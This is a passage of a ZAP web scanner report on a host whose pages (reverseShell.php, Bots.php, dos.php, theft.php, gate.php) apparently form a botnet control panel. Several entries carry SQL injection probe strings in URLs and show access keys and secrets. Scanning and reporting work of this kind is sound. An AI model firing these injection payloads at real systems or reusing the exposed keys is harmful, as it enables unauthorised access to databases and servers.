Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 6
Solution
This is an informational alert rather than a vulnerability and so there is nothing to fix.
Reference https://www.zaproxy.org/docs/desktop/addons/authentication-helper/auth-req-id/
Tags
CWE Id
WASC Id
Plugin Id 10111
Informational
Cookie Slack Detector
Description
Repeated GET requests: drop a different cookie each time, followed by normal request with all cookies to stabilize session, compare responses against original baseline GET. This can reveal areas where cookie based authentication/attributes are not actually enforced.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 245 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence
Request Header - size: 211 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 694 bytes.
Request Body - size: 0 bytes.
Response Header - size: 311 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 807 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 221 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 425 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 243 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 439 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 749 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 401 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 664 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 704 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 234 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 24
Solution
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-SESS-02
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90027
Informational
GET for POST
Description
A request that was originally observed as a POST was also accepted as a GET. This issue does not represent a security weakness unto itself, however, it may facilitate simplification of other attacks. For example if the original POST is subject to Cross-Site Scripting (XSS), then this finding may indicate that a simplified (GET based) XSS may also be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?password=ZAP&secret=&username=ZAP HTTP/1.1
Request Header - size: 502 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=%5C'%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%5C'a%5C')%20--%20-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd&username=RawPHP HTTP/1.1
Request Header - size: 1,132 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password='UNION%20SELECT%20NULL,NULL,NULL%20--%20-%20--%20-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd&username=RawPHP HTTP/1.1
Request Header - size: 1,059 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password='UNION%20SELECT%20NULL,NULL,NULL%20--%20-%20--%20-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd&username=RawPHP%22)%20AND%208723=8723%2516 HTTP/1.1
Request Header - size: 1,081 bytes.
Request Body - size: 0 bytes.
Response Header - size: 333 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP HTTP/1.1
Request Header - size: 432 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9 HTTP/1.1
Request Header - size: 690 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit='%20UNION%20SELECT%20@@version%20--%20-&params='%20UNION%20SELECT%20@@version%20--%20-&task_select=1&unit_EXEC=18.9 HTTP/1.1
Request Header - size: 974 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 7
Solution
Ensure that only POST is accepted where POST is expected.
Reference
Tags OWASP_2021_A04
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 16
WASC Id 20
Plugin Id 10058
Informational
Information Disclosure - Sensitive Information in URL
Description
The request appeared to contain sensitive information leaked in the URL. This can violate PCI and most organizational compliance policies. You can configure the list of strings for this check to add or remove values specific to your environment.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter password
Attack
Evidence password
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter username
Attack
Evidence username
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter password
Attack
Evidence password
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter username
Attack
Evidence username
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
Instances 4
Solution
Do not pass sensitive information in URIs.
Reference
Tags OWASP_2021_A01
OWASP_2017_A03
CWE Id 200
WASC Id 13
Plugin Id 10024
Informational
Information Disclosure - Suspicious Comments
Description
The response appears to contain suspicious comments which may help an attacker. Note: Matches made within script blocks or files are against the entire content not only comments.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence from
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
Instances 5
Solution
Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.
Reference
Tags OWASP_2021_A01
WSTG-v42-INFO-05
OWASP_2017_A03
CWE Id 200
WASC Id 13
Plugin Id 10027
Informational
Insecure HTTP Method - COPY
Description
This HTTP method is a WEBDAV method: COPY. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method COPY
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 769 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Implement measures to obfuscate or disguise information about the system's platform, web application software technology, backend database version, configurations, and network architecture/topology. This can include:

1. **Platform and Software Diversity:** Use a mix of technologies and platforms to make it harder for attackers to build an accurate profile.

2. **False Information:** Introduce fake or misleading information in system responses to confuse fingerprinting tools.

3. **Response Randomization:** Randomize certain elements in responses to make it difficult for attackers to consistently identify the system.

4. **Firewall Rules:** Implement firewall rules to block or limit the effectiveness of fingerprinting techniques.

5. **Regular Updates:** Keep software, platforms, and configurations up-to-date to patch known vulnerabilities and prevent accurate identification based on outdated information.

There is no one-size-fits-all solution, and a combination of these measures may be most effective.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - LOCK
Description
This HTTP method is a WEBDAV method: LOCK. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method LOCK
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 769 bytes.
Request Body - size: 0 bytes.
Response Header - size: 256 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Implement measures to obfuscate or disguise information about the system's platform, web application software technology, backend database version, configurations, and network architecture/topology. This can include:

1. **Platform and Software Diversity:** Use a mix of technologies and platforms to make it harder for attackers to build an accurate profile.

2. **False Information:** Introduce fake or misleading information in system responses to confuse fingerprinting tools.

3. **Response Randomization:** Randomize certain elements in responses to make it difficult for attackers to consistently identify the system.

4. **Firewall Rules:** Implement firewall rules to block or limit the effectiveness of fingerprinting techniques.

5. **Regular Updates:** Keep software, platforms, and configurations up-to-date to patch known vulnerabilities and prevent accurate identification based on outdated information.

There is no one-size-fits-all solution, and a combination of these measures may be most effective.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - MKCOL
Description
This HTTP method is a WEBDAV method: MKCOL. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method MKCOL
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 770 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Implement measures to obfuscate or disguise information about the system's platform, web application software technology, backend database version, configurations, and network architecture/topology. This can include:

1. **Platform and Software Diversity:** Use a mix of technologies and platforms to make it harder for attackers to build an accurate profile.

2. **False Information:** Introduce fake or misleading information in system responses to confuse fingerprinting tools.

3. **Response Randomization:** Randomize certain elements in responses to make it difficult for attackers to consistently identify the system.

4. **Firewall Rules:** Implement firewall rules to block or limit the effectiveness of fingerprinting techniques.

5. **Regular Updates:** Keep software, platforms, and configurations up-to-date to patch known vulnerabilities and prevent accurate identification based on outdated information.

There is no one-size-fits-all solution, and a combination of these measures may be most effective.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - MOVE
Description
This HTTP method is a WEBDAV method: MOVE. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method MOVE
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 769 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Implement measures to obfuscate or disguise information about the system's platform, web application software technology, backend database version, configurations, and network architecture/topology. This can include:

1. **Platform and Software Diversity:** Use a mix of technologies and platforms to make it harder for attackers to build an accurate profile.

2. **False Information:** Introduce fake or misleading information in system responses to confuse fingerprinting tools.

3. **Response Randomization:** Randomize certain elements in responses to make it difficult for attackers to consistently identify the system.

4. **Firewall Rules:** Implement firewall rules to block or limit the effectiveness of fingerprinting techniques.

5. **Regular Updates:** Keep software, platforms, and configurations up-to-date to patch known vulnerabilities and prevent accurate identification based on outdated information.

There is no one-size-fits-all solution, and a combination of these measures may be most effective.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - PROPFIND
Description
This HTTP method is a WEBDAV method: PROPFIND. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method PROPFIND
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 773 bytes.
Request Body - size: 0 bytes.
Response Header - size: 256 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Implement measures to obfuscate or disguise information about the system's platform, web application software technology, backend database version, configurations, and network architecture/topology. This can include:

1. **Platform and Software Diversity:** Use a mix of technologies and platforms to make it harder for attackers to build an accurate profile.

2. **False Information:** Introduce fake or misleading information in system responses to confuse fingerprinting tools.

3. **Response Randomization:** Randomize certain elements in responses to make it difficult for attackers to consistently identify the system.

4. **Firewall Rules:** Implement firewall rules to block or limit the effectiveness of fingerprinting techniques.

5. **Regular Updates:** Keep software, platforms, and configurations up-to-date to patch known vulnerabilities and prevent accurate identification based on outdated information.

There is no one-size-fits-all solution, and a combination of these measures may be most effective.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - PROPPATCH
Description
This HTTP method is a WEBDAV method: PROPPATCH. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method PROPPATCH
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 774 bytes.
Request Body - size: 0 bytes.
Response Header - size: 256 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Implement measures to obfuscate or disguise information about the system's platform, web application software technology, backend database version, configurations, and network architecture/topology. This can include:

1. **Platform and Software Diversity:** Use a mix of technologies and platforms to make it harder for attackers to build an accurate profile.

2. **False Information:** Introduce fake or misleading information in system responses to confuse fingerprinting tools.

3. **Response Randomization:** Randomize certain elements in responses to make it difficult for attackers to consistently identify the system.

4. **Firewall Rules:** Implement firewall rules to block or limit the effectiveness of fingerprinting techniques.

5. **Regular Updates:** Keep software, platforms, and configurations up-to-date to patch known vulnerabilities and prevent accurate identification based on outdated information.

There is no one-size-fits-all solution, and a combination of these measures may be most effective.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - UNLOCK
Description
This HTTP method is a WEBDAV method: UNLOCK. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method UNLOCK
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 771 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Implement measures to obfuscate or disguise information about the system's platform, web application software technology, backend database version, configurations, and network architecture/topology. This can include:

1. **Platform and Software Diversity:** Use a mix of technologies and platforms to make it harder for attackers to build an accurate profile.

2. **False Information:** Introduce fake or misleading information in system responses to confuse fingerprinting tools.

3. **Response Randomization:** Randomize certain elements in responses to make it difficult for attackers to consistently identify the system.

4. **Firewall Rules:** Implement firewall rules to block or limit the effectiveness of fingerprinting techniques.

5. **Regular Updates:** Keep software, platforms, and configurations up-to-date to patch known vulnerabilities and prevent accurate identification based on outdated information.

There is no one-size-fits-all solution, and a combination of these measures may be most effective.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Modern Web Application
Description
The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <script> var dashboard = document.getElementById("dashboard"); var bots = document.getElementById("bots"); var dos = document.getElementById("dos"); var theft = document.getElementById("theft"); var settings = document.getElementById("settings"); var tasks = document.getElementById('tasks'); var watchdog = document.getElementById('watchdog'); var manager = document.getElementById('manager'); function retrieveResult() { var xmlReq = new XMLHttpRequest(); var url = "gate.php?bot=" + "DESKTOP-95IQEEV"; xmlReq.onreadystatechange = function() { if (xmlReq.readyState == 4 && xmlReq.status == 200) { if (xmlReq.responseText.length > 2) { document.getElementById("resultArea").innerHTML = ''; document.getElementById("resultArea").innerHTML = xmlReq.responseText; } } }; xmlReq.open("GET", url, true); xmlReq.send(); setTimeout(retrieveResult, 2000); } retrieveResult(); const userId = 54; const REDIRECT = (page) => { if (userId) { window.location.href = `${page}?id=${userId}`; } else { console.error("User ID not available"); window.location.href = page; } }; dashboard.addEventListener("click", () => { REDIRECT("dashboard.php"); }); tasks.addEventListener("click", () => { REDIRECT("tasks_page.php"); }); watchdog.addEventListener("click", () => { REDIRECT("watchdog.php"); }); manager.addEventListener("click", () => { REDIRECT("manager.php"); }); bots.addEventListener("click", () => { REDIRECT("Bots.php"); }); dos.addEventListener("click", () => { REDIRECT("dos.php"); }); theft.addEventListener("click", () => { REDIRECT("theft.php"); }); settings.addEventListener("click", () => { REDIRECT("settings_page.php"); }); </script>
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
